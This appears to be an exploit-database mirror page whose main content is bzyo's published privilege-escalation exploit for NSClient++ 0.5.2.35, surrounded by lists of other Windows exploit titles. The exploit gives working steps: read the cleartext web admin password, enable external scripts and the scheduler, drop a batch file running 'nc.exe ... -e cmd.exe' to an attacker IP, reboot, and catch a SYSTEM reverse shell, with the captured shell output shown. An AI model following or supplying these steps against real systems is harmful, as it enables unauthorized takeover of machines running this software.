Menu

Improved exploit search engine. Try it out

"NSClient++ 0.5.2.35 - Privilege Escalation"

Author

bzyo

Platform

windows

Release date

2019-05-06

Release Date Title Type Platform Author
2019-07-17 "MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow" remote windows hyp3rlinx
2019-07-17 "Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-17 "WinMPG iPod Convert 3.0 - 'Register' Denial of Service" dos windows stresser
2019-07-16 "Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-16 "DameWare Remote Support 12.0.0.509 - 'Host' Buffer Overflow (SEH)" local windows "Xavi Beltran"
2019-07-16 "R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH (DEP/ASLR Bypass)" local windows blackleitus
2019-07-16 "Microsoft Compiled HTML Help / Uncompiled .chm File - XML External Entity Injection" dos windows hyp3rlinx
2019-07-15 "Streamripper 2.6 - 'Song Pattern' Buffer Overflow" local windows "Andrey Stoykov"
2019-07-15 "Microsoft Windows Remote Desktop - 'BlueKeep' Denial of Service (Metasploit)" dos windows "RAMELLA Sebastien"
2019-07-12 "Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation" local windows "Google Security Research"
2019-07-11 "SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow" local windows xerubus
2019-07-12 "Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - NULL Pointer Dereferences in OpenType Font Handling While Accessing Empty dynarrays" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Multiple Bugs in OpenType Font Handling Related to the _post_ Table" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Out-of-Bounds Read in OpenType Font Handling Due to Undefined FontName Index" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling While Processing CFF Blend DICT Operator" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readStrings" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Unbounded iFD" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow Due to Integer Overflow in readTTCDirectory" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readCharset" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readFDSelect" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Heap-Based Buffer Overflow in OpenType Font Handling in readEncoding" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Incorrect Handling of blendArray" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Interpreter Stack Underflow in OpenType Font Handling Due to Missing CHKUFLOW" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Use of Uninitialized Memory While Freeing Resources in var_loadavar" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack-Based Buffer Overflow in do_set_weight_vector_cube for Large nAxes" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative nAxes" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling Due to Negative cubeStackDepth" dos windows "Google Security Research"
2019-07-10 "Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling due to Out-of-Bounds cubeStackDepth" dos windows "Google Security Research"
Release Date Title Type Platform Author
2019-05-17 "Iperius Backup 6.1.0 - Privilege Escalation" local windows bzyo
2019-05-06 "NSClient++ 0.5.2.35 - Privilege Escalation" local windows bzyo
2019-02-14 "exacqVision ESM 5.12.2 - Privilege Escalation" local windows bzyo
2019-01-30 "10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-28 "Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2019-01-11 "Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)" local windows bzyo
2019-01-10 "RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)" local windows bzyo
2018-12-27 "Iperius Backup 5.8.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-27 "MAGIX Music Editor 3.1 - Buffer Overflow (SEH)" local windows_x86 bzyo
2018-12-20 "Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)" local windows bzyo
2018-12-20 "LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)" local windows_x86 bzyo
2018-12-11 "PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion" webapps multiple bzyo
2018-09-12 "SynaMan 4.0 build 1488 - SMTP Credential Disclosure" webapps windows bzyo
2018-09-12 "SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)" webapps windows bzyo
2018-04-18 "Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities" webapps xml bzyo
2018-02-27 "GetGo Download Manager 5.3.0.2712 - Buffer Overflow (SEH)" remote windows bzyo
2018-08-06 "AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)" local windows bzyo
2018-07-23 "Splinterware System Scheduler Pro 5.12 - Privilege Escalation" local windows bzyo
2018-07-23 "Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)" local windows bzyo
2018-04-24 "RGui 3.4.4 - Local Buffer Overflow" local windows bzyo
2018-04-17 "Reaper 5.78 - Local Buffer Overflow" local windows bzyo
2018-04-09 "GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)" local windows bzyo
2018-04-02 "WebLog Expert Enterprise 9.4 - Privilege Escalation" local windows bzyo
2018-03-26 "LabF nfsAxe 3.7 - Privilege Escalation" local windows bzyo
2018-03-05 "Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow" local windows bzyo
2018-03-02 "IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)" local windows bzyo
2018-03-02 "IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)" local windows bzyo
2018-05-06 "HWiNFO 5.82-3410 - Denial of Service" dos windows bzyo
2018-03-23 "WM Recorder 16.8.1 - Denial of Service" dos windows bzyo
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46802/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46802/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46802/41232/nsclient-05235-privilege-escalation/download/", "exploit_id": "46802", "exploit_description": "\"NSClient++ 0.5.2.35 - Privilege Escalation\"", "exploit_date": "2019-05-06", "exploit_author": "bzyo", "exploit_type": "local", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64

Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file.  From here a user is able to login to the web server and make changes to the configuration file that is normally restricted.  

The user is able to enable the modules to check external scripts and schedule those scripts to run.  There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere.  Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation.  A reboot, as far as I can tell, is required to reload and read the changes to the web config.  

Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.

Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
	C:\Program Files\NSClient++>nscp web -- password --display
	Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine
	@echo off
	c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine
	nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
	- foobar
		command = c:\temp\evil.bat

6. Add schedulede to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
	- foobar
		interval = 1m
		command = foobar

7. Restart the computer and wait for the reverse shell on attacking machine
	nc -nlvvp 443
	listening on [any] 443 ...
	connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
	Microsoft Windows [Version 10.0.17134.753]
	(c) 2018 Microsoft Corporation. All rights reserved.

	C:\Program Files\NSClient++>whoami
	whoami
	nt authority\system
	
Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System